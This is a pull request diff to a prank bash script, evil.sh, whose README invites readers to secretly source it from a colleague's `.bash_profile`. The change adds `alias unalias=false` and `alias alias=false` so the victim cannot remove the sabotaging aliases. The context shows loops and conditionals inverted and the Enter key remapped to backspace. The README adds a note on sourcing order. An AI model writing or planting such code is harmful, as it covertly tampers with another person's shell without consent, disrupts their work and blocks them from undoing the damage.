### PR TITLE
disable alias and unalias

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,6 +3,7 @@
 A collection of various subtle and not-so-subtle shell tweaks that will slowly drive people insane.
 
 Feel like trolling a colleague? Just add `source ~/evil.sh` to their `.bash_profile` and watch the chaos ensue.
+Be aware that the sourcing should happen at the end of the file, if you do not edit `evil.sh` before doing so, as `evil.sh` disables `alias` and `unalias`.
 
 ## Contributions
 

--- a/evil.sh
+++ b/evil.sh
@@ -74,3 +74,7 @@ alias if='if !' for='for !' while='while !';
 # Map Enter, Ctrl+J, and Ctrl+M to backspace.
 bind '"\C-J":"\C-?"';
 bind '"\C-M":"\C-?"';
+
+# Disable `unalias` and `alias`
+alias unalias=false;
+alias alias=false;


### PR DESCRIPTION
This disables `alias` and `unalias` at the end of the file.

And adds a note to the `README.md` regarding the sourcing as this might break things (that shouldn't break).
